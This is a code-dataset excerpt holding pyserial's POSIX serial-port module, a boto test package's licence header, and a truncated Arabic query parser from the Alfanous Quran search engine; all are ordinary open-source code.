repo_name
stringlengths
5
100
path
stringlengths
4
375
copies
stringclasses
991 values
size
stringlengths
4
7
content
stringlengths
666
1M
license
stringclasses
15 values
whaleygeek/punchcard_reader
cardreader/serial/serialposix.py
141
26585
#!/usr/bin/env python # # Python Serial Port Extension for Win32, Linux, BSD, Jython # module for serial IO for POSIX compatible systems, like Linux # see __init__.py # # (C) 2001-2010 Chris Liechti <cliechti@gmx.net> # this is distributed under a free software license, see license.txt # # parts based on code from Grant B. Edwards <grante@visi.com>: # ftp://ftp.visi.com/users/grante/python/PosixSerial.py # # references: http://www.easysw.com/~mike/serial/serial.html import sys, os, fcntl, termios, struct, select, errno, time from serial.serialutil import * # Do check the Python version as some constants have moved. if (sys.hexversion < 0x020100f0): import TERMIOS else: TERMIOS = termios if (sys.hexversion < 0x020200f0): import FCNTL else: FCNTL = fcntl # try to detect the OS so that a device can be selected... # this code block should supply a device() and set_special_baudrate() function # for the platform plat = sys.platform.lower() if plat[:5] == 'linux': # Linux (confirmed) def device(port): return '/dev/ttyS%d' % port TCGETS2 = 0x802C542A TCSETS2 = 0x402C542B BOTHER = 0o010000 def set_special_baudrate(port, baudrate): # right size is 44 on x86_64, allow for some growth import array buf = array.array('i', [0] * 64) try: # get serial_struct FCNTL.ioctl(port.fd, TCGETS2, buf) # set custom speed buf[2] &= ~TERMIOS.CBAUD buf[2] |= BOTHER buf[9] = buf[10] = baudrate # set serial_struct res = FCNTL.ioctl(port.fd, TCSETS2, buf) except IOError, e: raise ValueError('Failed to set custom baud rate (%s): %s' % (baudrate, e)) baudrate_constants = { 0: 0000000, # hang up 50: 0000001, 75: 0000002, 110: 0000003, 134: 0000004, 150: 0000005, 200: 0000006, 300: 0000007, 600: 0000010, 1200: 0000011, 1800: 0000012, 2400: 0000013, 4800: 0000014, 9600: 0000015, 19200: 0000016, 38400: 0000017, 57600: 0010001, 115200: 0010002, 230400: 0010003, 460800: 0010004, 500000: 0010005, 576000: 0010006, 921600: 0010007, 1000000: 0010010, 1152000: 0010011, 1500000: 0010012, 2000000: 0010013, 2500000: 0010014, 3000000: 0010015, 3500000: 0010016, 4000000: 0010017 } elif plat == 'cygwin': # cygwin/win32 (confirmed) def device(port): return '/dev/com%d' % (port + 1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = { 128000: 0x01003, 256000: 0x01005, 500000: 0x01007, 576000: 0x01008, 921600: 0x01009, 1000000: 0x0100a, 1152000: 0x0100b, 1500000: 0x0100c, 2000000: 0x0100d, 2500000: 0x0100e, 3000000: 0x0100f } elif plat[:7] == 'openbsd': # OpenBSD def device(port): return '/dev/cua%02d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'bsd' or \ plat[:7] == 'freebsd': def device(port): return '/dev/cuad%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:6] == 'darwin': # OS X version = os.uname()[2].split('.') # Tiger or above can support arbitrary serial speeds if int(version[0]) >= 8: def set_special_baudrate(port, baudrate): # use IOKit-specific call to set up high speeds import array, fcntl buf = array.array('i', [baudrate]) IOSSIOSPEED = 0x80045402 #_IOW('T', 2, speed_t) fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1) else: # version < 8 def set_special_baudrate(port, baudrate): raise ValueError("baud rate not supported") def device(port): return '/dev/cuad%d' % port baudrate_constants = {} elif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk def device(port): return '/dev/dty%02d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:4] == 'irix': # IRIX (partially tested) def device(port): return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:2] == 'hp': # HP-UX (not tested) def device(port): return '/dev/tty%dp0' % (port+1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:5] == 'sunos': # Solaris/SunOS (confirmed) def device(port): return '/dev/tty%c' % (ord('a')+port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'aix': # AIX def device(port): return '/dev/tty%d' % (port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} else: # platform detection has failed... sys.stderr.write("""\ don't know how to number ttys on this system. ! Use an explicit path (eg /dev/ttyS1) or send this information to ! the author of this module: sys.platform = %r os.name = %r serialposix.py version = %s also add the device name of the serial port and where the counting starts for the first serial port. e.g. 'first serial port: /dev/ttyS0' and with a bit luck you can get this module running... """ % (sys.platform, os.name, VERSION)) # no exception, just continue with a brave attempt to build a device name # even if the device name is not correct for the platform it has chances # to work using a string with the real device name as port parameter. def device(portum): return '/dev/ttyS%d' % portnum def set_special_baudrate(port, baudrate): raise SerialException("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} #~ raise Exception, "this module does not run on this platform, sorry." # whats up with "aix", "beos", .... # they should work, just need to know the device names. # load some constants for later use. # try to use values from TERMIOS, use defaults from linux otherwise TIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415 TIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416 TIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417 TIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418 #TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001 TIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002 TIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004 #TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008 #TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010 TIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020 TIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040 TIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080 TIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100 TIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR TIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG #TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000 #TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000 if hasattr(TERMIOS, 'TIOCINQ'): TIOCINQ = TERMIOS.TIOCINQ else: TIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B TIOCOUTQ = hasattr(TERMIOS, 'TIOCOUTQ') and TERMIOS.TIOCOUTQ or 0x5411 TIOCM_zero_str = struct.pack('I', 0) TIOCM_RTS_str = struct.pack('I', TIOCM_RTS) TIOCM_DTR_str = struct.pack('I', TIOCM_DTR) TIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427 TIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428 class PosixSerial(SerialBase): """Serial port class POSIX implementation. Serial port configuration is done with termios and fcntl. Runs on Linux and many other Un*x like systems.""" def open(self): """Open port with current settings. This may throw a SerialException if the port cannot be opened.""" if self._port is None: raise SerialException("Port must be configured before it can be used.") if self._isOpen: raise SerialException("Port is already open.") self.fd = None # open try: self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK) except IOError, msg: self.fd = None raise SerialException(msg.errno, "could not open port %s: %s" % (self._port, msg)) #~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking try: self._reconfigurePort() except: try: os.close(self.fd) except: # ignore any exception when closing the port # also to keep original exception that happened when setting up pass self.fd = None raise else: self._isOpen = True self.flushInput() def _reconfigurePort(self): """Set communication parameters on opened port.""" if self.fd is None: raise SerialException("Can only operate on a valid file descriptor") custom_baud = None vmin = vtime = 0 # timeout is done via select if self._interCharTimeout is not None: vmin = 1 vtime = int(self._interCharTimeout * 10) try: orig_attr = termios.tcgetattr(self.fd) iflag, oflag, cflag, lflag, ispeed, ospeed, cc = orig_attr except termios.error, msg: # if a port is nonexistent but has a /dev file, it'll fail here raise SerialException("Could not configure port: %s" % msg) # set up raw mode / no echo / binary cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD) lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL| TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk if hasattr(TERMIOS, flag): lflag &= ~getattr(TERMIOS, flag) oflag &= ~(TERMIOS.OPOST) iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK) if hasattr(TERMIOS, 'IUCLC'): iflag &= ~TERMIOS.IUCLC if hasattr(TERMIOS, 'PARMRK'): iflag &= ~TERMIOS.PARMRK # setup baud rate try: ispeed = ospeed = getattr(TERMIOS, 'B%s' % (self._baudrate)) except AttributeError: try: ispeed = ospeed = baudrate_constants[self._baudrate] except KeyError: #~ raise ValueError('Invalid baud rate: %r' % self._baudrate) # may need custom baud rate, it isn't in our list. ispeed = ospeed = getattr(TERMIOS, 'B38400') try: custom_baud = int(self._baudrate) # store for later except ValueError: raise ValueError('Invalid baud rate: %r' % self._baudrate) else: if custom_baud < 0: raise ValueError('Invalid baud rate: %r' % self._baudrate) # setup char len cflag &= ~TERMIOS.CSIZE if self._bytesize == 8: cflag |= TERMIOS.CS8 elif self._bytesize == 7: cflag |= TERMIOS.CS7 elif self._bytesize == 6: cflag |= TERMIOS.CS6 elif self._bytesize == 5: cflag |= TERMIOS.CS5 else: raise ValueError('Invalid char len: %r' % self._bytesize) # setup stopbits if self._stopbits == STOPBITS_ONE: cflag &= ~(TERMIOS.CSTOPB) elif self._stopbits == STOPBITS_ONE_POINT_FIVE: cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. there is no POSIX support for 1.5 elif self._stopbits == STOPBITS_TWO: cflag |= (TERMIOS.CSTOPB) else: raise ValueError('Invalid stop bit specification: %r' % self._stopbits) # setup parity iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP) if self._parity == PARITY_NONE: cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD) elif self._parity == PARITY_EVEN: cflag &= ~(TERMIOS.PARODD) cflag |= (TERMIOS.PARENB) elif self._parity == PARITY_ODD: cflag |= (TERMIOS.PARENB|TERMIOS.PARODD) else: raise ValueError('Invalid parity: %r' % self._parity) # setup flow control # xonxoff if hasattr(TERMIOS, 'IXANY'): if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY) else: if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF) # rtscts if hasattr(TERMIOS, 'CRTSCTS'): if self._rtscts: cflag |= (TERMIOS.CRTSCTS) else: cflag &= ~(TERMIOS.CRTSCTS) elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant name if self._rtscts: cflag |= (TERMIOS.CNEW_RTSCTS) else: cflag &= ~(TERMIOS.CNEW_RTSCTS) # XXX should there be a warning if setting up rtscts (and xonxoff etc) fails?? # buffer # vmin "minimal number of characters to be read. = for non blocking" if vmin < 0 or vmin > 255: raise ValueError('Invalid vmin: %r ' % vmin) cc[TERMIOS.VMIN] = vmin # vtime if vtime < 0 or vtime > 255: raise ValueError('Invalid vtime: %r' % vtime) cc[TERMIOS.VTIME] = vtime # activate settings if [iflag, oflag, cflag, lflag, ispeed, ospeed, cc] != orig_attr: termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]) # apply custom baud rate, if any if custom_baud is not None: set_special_baudrate(self, custom_baud) def close(self): """Close port""" if self._isOpen: if self.fd is not None: os.close(self.fd) self.fd = None self._isOpen = False def makeDeviceName(self, port): return device(port) # - - - - - - - - - - - - - - - - - - - - - - - - def inWaiting(self): """Return the number of characters currently in the input buffer.""" #~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str) s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str) return struct.unpack('I',s)[0] # select based implementation, proved to work on many systems def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if not self._isOpen: raise portNotOpenError read = bytearray() while len(read) < size: try: ready,_,_ = select.select([self.fd],[],[], self._timeout) # If select was used with a timeout, and the timeout occurs, it # returns with empty lists -> thus abort read operation. # For timeout == 0 (non-blocking operation) also abort when there # is nothing to read. if not ready: break # timeout buf = os.read(self.fd, size-len(read)) # read should always return some data as select reported it was # ready to read when we get to this point. if not buf: # Disconnected devices, at least on Linux, show the # behavior that they are always ready to read immediately # but reading returns nothing. raise SerialException('device reports readiness to read but returned no data (device disconnected or multiple access on port?)') read.extend(buf) except select.error, e: # ignore EAGAIN errors. all other errors are shown # see also http://www.python.org/dev/peps/pep-3151/#select if e[0] != errno.EAGAIN: raise SerialException('read failed: %s' % (e,)) except OSError, e: # ignore EAGAIN errors. all other errors are shown if e.errno != errno.EAGAIN: raise SerialException('read failed: %s' % (e,)) return bytes(read) def write(self, data): """Output the given string over the serial port.""" if not self._isOpen: raise portNotOpenError d = to_bytes(data) tx_len = len(d) if self._writeTimeout is not None and self._writeTimeout > 0: timeout = time.time() + self._writeTimeout else: timeout = None while tx_len > 0: try: n = os.write(self.fd, d) if timeout: # when timeout is set, use select to wait for being ready # with the time left as timeout timeleft = timeout - time.time() if timeleft < 0: raise writeTimeoutError _, ready, _ = select.select([], [self.fd], [], timeleft) if not ready: raise writeTimeoutError else: # wait for write operation _, ready, _ = select.select([], [self.fd], [], None) if not ready: raise SerialException('write failed (select)') d = d[n:] tx_len -= n except OSError, v: if v.errno != errno.EAGAIN: raise SerialException('write failed: %s' % (v,)) return len(data) def flush(self): """Flush of file like objects. In this case, wait until all data is written.""" self.drainOutput() def flushInput(self): """Clear input buffer, discarding all that is in the buffer.""" if not self._isOpen: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCIFLUSH) def flushOutput(self): """Clear output buffer, aborting the current output and discarding all that is in the buffer.""" if not self._isOpen: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCOFLUSH) def sendBreak(self, duration=0.25): """Send break condition. Timed, returns to idle state after given duration.""" if not self._isOpen: raise portNotOpenError termios.tcsendbreak(self.fd, int(duration/0.25)) def setBreak(self, level=1): """Set break: Controls TXD. When active, no transmitting is possible.""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCSBRK) else: fcntl.ioctl(self.fd, TIOCCBRK) def setRTS(self, level=1): """Set terminal status line: Request To Send""" if not self._isOpen: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str) def setDTR(self, level=1): """Set terminal status line: Data Terminal Ready""" if not self._isOpen: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str) def getCTS(self): """Read terminal status line: Clear To Send""" if not self._isOpen: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CTS != 0 def getDSR(self): """Read terminal status line: Data Set Ready""" if not self._isOpen: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_DSR != 0 def getRI(self): """Read terminal status line: Ring Indicator""" if not self._isOpen: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_RI != 0 def getCD(self): """Read terminal status line: Carrier Detect""" if not self._isOpen: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CD != 0 # - - platform specific - - - - def outWaiting(self): """Return the number of characters currently in the output buffer.""" #~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str) s = fcntl.ioctl(self.fd, TIOCOUTQ, TIOCM_zero_str) return struct.unpack('I',s)[0] def drainOutput(self): """internal - not portable!""" if not self._isOpen: raise portNotOpenError termios.tcdrain(self.fd) def nonblocking(self): """internal - not portable!""" if not self._isOpen: raise portNotOpenError fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK) def fileno(self): """\ For easier use of the serial port instance with select. WARNING: this function is not portable to different platforms! """ if not self._isOpen: raise portNotOpenError return self.fd def setXON(self, level=True): """\ Manually control flow - when software flow control is enabled. This will send XON (true) and XOFF (false) to the other device. WARNING: this function is not portable to different platforms! """ if not self.hComPort: raise portNotOpenError if enable: termios.tcflow(self.fd, TERMIOS.TCION) else: termios.tcflow(self.fd, TERMIOS.TCIOFF) def flowControlOut(self, enable): """\ Manually control flow of outgoing data - when hardware or software flow control is enabled. WARNING: this function is not portable to different platforms! """ if not self._isOpen: raise portNotOpenError if enable: termios.tcflow(self.fd, TERMIOS.TCOON) else: termios.tcflow(self.fd, TERMIOS.TCOOFF) # assemble Serial class with the platform specifc implementation and the base # for file-like behavior. for Python 2.6 and newer, that provide the new I/O # library, derrive from io.RawIOBase try: import io except ImportError: # classic version with our own file-like emulation class Serial(PosixSerial, FileLike): pass else: # io library present class Serial(PosixSerial, io.RawIOBase): pass class PosixPollSerial(Serial): """poll based read implementation. not all systems support poll properly. however this one has better handling of errors, such as a device disconnecting while it's in use (e.g. USB-serial unplugged)""" def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() poll = select.poll() poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL) if size > 0: while len(read) < size: # print "\tread(): size",size, "have", len(read) #debug # wait until device becomes ready to read (or something fails) for fd, event in poll.poll(self._timeout*1000): if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL): raise SerialException('device reports error (poll)') # we don't care if it is select.POLLIN or timeout, that's # handled below buf = os.read(self.fd, size - len(read)) read.extend(buf) if ((self._timeout is not None and self._timeout >= 0) or (self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf: break # early abort on timeout return bytes(read) if __name__ == '__main__': s = Serial(0, baudrate=19200, # baud rate bytesize=EIGHTBITS, # number of data bits parity=PARITY_EVEN, # enable parity checking stopbits=STOPBITS_ONE, # number of stop bits timeout=3, # set a timeout value, None for waiting forever xonxoff=0, # enable software flow control rtscts=0, # enable RTS/CTS flow control ) s.setRTS(1) s.setDTR(1) s.flushInput() s.flushOutput() s.write('hello') sys.stdout.write('%r\n' % s.read(5)) sys.stdout.write('%s\n' % s.inWaiting()) del s
mit
chenc10/Spark-PAF
dist/ec2/lib/boto-2.34.0/tests/integration/sqs/__init__.py
761
1104
# Copyright (c) 2006-2011 Mitch Garnaat http://garnaat.org/ # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE.
apache-2.0
muslih/alfanous
src/alfanous/QueryProcessing.py
2
27994
#!/usr/bin/env python2 # coding: utf-8 # # Copyright (C) 2009-2012 Assem Chelli <assem.ch [at] gmail.com> # # This program is free software: you can redistribute it and/or modify # # it under the terms of the GNU Affero General Public License as published # # by the Free Software Foundation, either version 3 of the License, or # # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # # but WITHOUT ANY WARRANTY; without even the implied warranty of # # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # # along with this program. If not, see <http://www.gnu.org/licenses/>. """ This module contains customized query parsers for Arabic and Quran. TODO Buckwalter/Other codings Search {bw! kutubo } TODO Upgrading Tuple Search to Embeded Query Search {1! word="foo"} TODO Smart-search : take the optimal choice with NLP! TODO Synonyme-Antonyme Upgrade to related search {syn! fire } FIXME multifields """ from pyparsing import printables, alphanums from pyparsing import ZeroOrMore, OneOrMore from pyparsing import Group, Combine, Suppress, Optional, FollowedBy from pyparsing import Literal, CharsNotIn, Word, Keyword from pyparsing import Empty, White, Forward, QuotedString from pyparsing import StringEnd # , ParserElement from alfanous.Support.whoosh.qparser import QueryParser # , MultifieldParser from alfanous.Support.whoosh.query import Term, MultiTerm from alfanous.Support.whoosh.query import Wildcard as whoosh_Wildcard from alfanous.Support.whoosh.query import Prefix as whoosh_Prefix from alfanous.Support.whoosh.query import Or, NullQuery, Every , And #### Importing dynamically compiled resources # # Importing synonyms dictionary try: from alfanous.dynamic_resources.synonymes_dyn import syndict except ImportError: syndict = {} # # Importing field names arabic-to-english mapping dictionary try: from alfanous.dynamic_resources.arabicnames_dyn import ara2eng_names except ImportError: ara2eng_names = {} # # Importing word properties dictionary try: from alfanous.dynamic_resources.word_props_dyn import worddict except ImportError: worddict = {} # # Importing derivations dictionary try: from alfanous.dynamic_resources.derivations_dyn import derivedict except ImportError: derivedict = {} # # Importing antonyms dictionary try: from alfanous.dynamic_resources.antonymes_dyn import antdict except ImportError: antdict = {} from alfanous.Indexing import QseDocIndex from alfanous.Exceptions import FeedBack # , NotImplemented from alfanous.TextProcessing import QArabicSymbolsFilter, unicode_ from alfanous.Misc import LOCATE, FIND, FILTER_DOUBLES FEEDBACK = True def _make_arabic_parser(): escapechar = "//" # wordchars = printables # for specialchar in '*?^():"{}[] ' + escapechar: # wordchars = wordchars.replace(specialchar, "") # wordtext = Word(wordchars) alephba = u""" abcdefghijklmnopqrstuvwxyz_ األآإـتنمكطدجحخهعغفقثصضشسيبئءؤرىةوزظذ """ wordtext = CharsNotIn( u'//*؟^():"{}[]$><%~#،,\' +-|' ) escape = Suppress( escapechar ) \ + ( Word( printables, exact = 1 ) | White( exact = 1 ) ) wordtoken = Combine( OneOrMore( wordtext | escape ) ) # A plain old word. plainWord = Group( wordtoken ).setResultsName( "Word" ) # A wildcard word containing * or ?. wildchars = Word( u"؟?*" ) # Start with word chars and then have wild chars mixed in wildmixed = wordtoken + OneOrMore( wildchars + Optional( wordtoken ) ) # Or, start with wildchars, and then either a mixture of word and wild chars # , or the next token wildstart = wildchars \ + ( OneOrMore( wordtoken + Optional( wildchars ) ) \ | FollowedBy( White() \ | StringEnd() ) ) wildcard = Group( Combine( wildmixed | wildstart ) ).setResultsName( "Wildcard" ) # A range of terms startfence = Literal( "[" ) endfence = Literal( "]" ) rangeitem = QuotedString( '"' ) | wordtoken to = Keyword( u"الى" ) \ | Keyword( u"إلى" ) \ | Keyword( "To" ) \ | Keyword( "to" ) \ | Keyword( "TO" ) openstartrange = Group( Empty() ) \ + Suppress( to + White() ) \ + Group( rangeitem ) openendrange = Group( rangeitem ) \ + Suppress( White() + to ) \ + Group( Empty() ) normalrange = Group( rangeitem ) \ + Suppress( White() + to + White() ) \ + Group( rangeitem ) range = Group( startfence \ + ( normalrange | openstartrange | openendrange ) \ + endfence ).setResultsName( "Range" ) # synonyms syn_symbol = Literal( "~" ) synonym = Group( syn_symbol + wordtoken ).setResultsName( "Synonyms" ) # antonyms ant_symbol = Literal( "#" ) antonym = Group( ant_symbol + wordtoken ).setResultsName( "Antonyms" ) # derivation level 1,2 derive_symbole = Literal( u"<" ) | Literal( u">" ) derivation = Group( OneOrMore( derive_symbole ) + wordtoken ).setResultsName( "Derivation" ) # spellerrors # spellerrors=Group(QuotedString('\'')).setResultsName("Errors") spellerrors_symbole = Literal( u"%" ) spellerrors = Group( spellerrors_symbole + wordtoken ).setResultsName( "SpellErrors" ) # shakl:must uplevel to boostable tashkil_symbol = Literal( "'" ) tashkil = Group( tashkil_symbol + \ ZeroOrMore( wordtoken | White() ) + \ tashkil_symbol ).setResultsName( "Tashkil" ) # tuple search (root,pattern,type) starttuple = Literal( "{" ) endtuple = Literal( "}" ) bettuple = Literal( u"،" ) | Literal( "," ) wordtuple = Group( Optional( wordtoken ) ) tuple = Group( starttuple + \ wordtuple + \ ZeroOrMore( bettuple + wordtuple ) + \ endtuple ).setResultsName( "Tuple" ) # A word-like thing generalWord = range | wildcard | plainWord | tuple | antonym | synonym | \ derivation | tashkil | spellerrors # A quoted phrase quotedPhrase = Group( QuotedString( '"' ) ).setResultsName( "Quotes" ) expression = Forward() # Parentheses can enclose (group) any expression parenthetical = Group( ( Suppress( "(" ) + expression + Suppress( ")" ) ) ).setResultsName( "Group" ) boostableUnit = generalWord | quotedPhrase boostedUnit = Group( boostableUnit + \ Suppress( "^" ) + \ Word( "0123456789", ".0123456789" ) ).setResultsName( "Boost" ) # The user can flag that a parenthetical group, quoted phrase, or word # should be searched in a particular field by prepending 'fn:', where fn is # the name of the field. fieldableUnit = parenthetical | boostedUnit | boostableUnit fieldedUnit = Group( ( Word( alephba + "_" ) | Word( alphanums + "_" ) ) + \ Suppress( ':' ) + \ fieldableUnit ).setResultsName( "Field" ) # Units of content unit = fieldedUnit | fieldableUnit # A unit may be "not"-ed. operatorNot = Group( Suppress( Keyword( u"ليس" ) | Keyword( u"NOT" ) ) + \ Suppress( White() ) + \ unit ).setResultsName( "Not" ) generalUnit = operatorNot | unit andToken = Keyword( u"و" ) | Keyword( u"AND" ) orToken = Keyword( u"أو" ) | Keyword( u"او" ) | Keyword( u"OR" ) andNotToken = Keyword( u"وليس" ) | Keyword( u"ANDNOT" ) operatorAnd = Group( ( generalUnit + \ Suppress( White() ) + \ Suppress( andToken ) + \ Suppress( White() ) + \ expression ) | \ ( generalUnit + \ Suppress( Literal( u"+" ) ) + \ expression ) ).setResultsName( "And" ) operatorOr = Group( ( generalUnit + \ Suppress( White() ) + \ Suppress( orToken ) + \ Suppress( White() ) + \ expression ) | \ ( generalUnit + \ Suppress( Literal( u"|" ) ) + \ expression ) ).setResultsName( "Or" ) operatorAndNot = Group( ( unit + \ Suppress( White() ) + \ Suppress( andNotToken ) + \ Suppress( White() ) + \ expression ) | \ ( unit + \ Suppress( Literal( u"-" ) ) + \ expression ) ).setResultsName( "AndNot" ) expression << ( OneOrMore( operatorAnd | operatorOr | operatorAndNot | \ generalUnit | Suppress( White() ) ) | Empty() ) toplevel = Group( expression ).setResultsName( "Toplevel" ) + StringEnd() return toplevel.parseString ARABIC_PARSER_FN = _make_arabic_parser() class StandardParser( QueryParser ): # def __init__( self, schema, mainfield, otherfields, termclass = Term ): super( StandardParser, self ).__init__( mainfield, schema = schema, conjunction = Or, termclass = termclass ) class ArabicParser( StandardParser ): """a customized parser that respects Arabic properties""" def __init__( self, schema, mainfield, otherfields = [], termclass = Term, ara2eng = ara2eng_names ): super( ArabicParser, self ).__init__( schema = schema, mainfield = mainfield, otherfields = otherfields, termclass = termclass ) self.parser = ARABIC_PARSER_FN self.ara2eng = ara2eng def _Field( self, node, fieldname ): if self.ara2eng.has_key( node[0] ): name = self.ara2eng[node[0]] else: name = node[0] return self._eval( node[1], name ) def _Synonyms( self, node, fieldname ): return self.make_synonyms( fieldname, node[1] ) def _Antonyms( self, node, fieldname ): return self.make_antonyms( fieldname, node[1] ) def _Derivation( self, node, fieldname ): return self.make_derivation( fieldname, text = node[-1], level = len( node ) - 1 ) def _SpellErrors( self, node, fieldname ): return self.make_spellerrors( fieldname, node[1] ) def _Tashkil( self, node, fieldname ): if len( node ) > 2:lst = node[1:-1] else:lst = [] return self.make_tashkil( fieldname, lst ) def _Tuple( self, node, fieldname ): return self.make_tuple( fieldname, [node[i][0] for i in range( 1, len( node ), 2 )] ) def _Prefix( self, node, fieldname ): return self.make_prefix( fieldname, node[1] 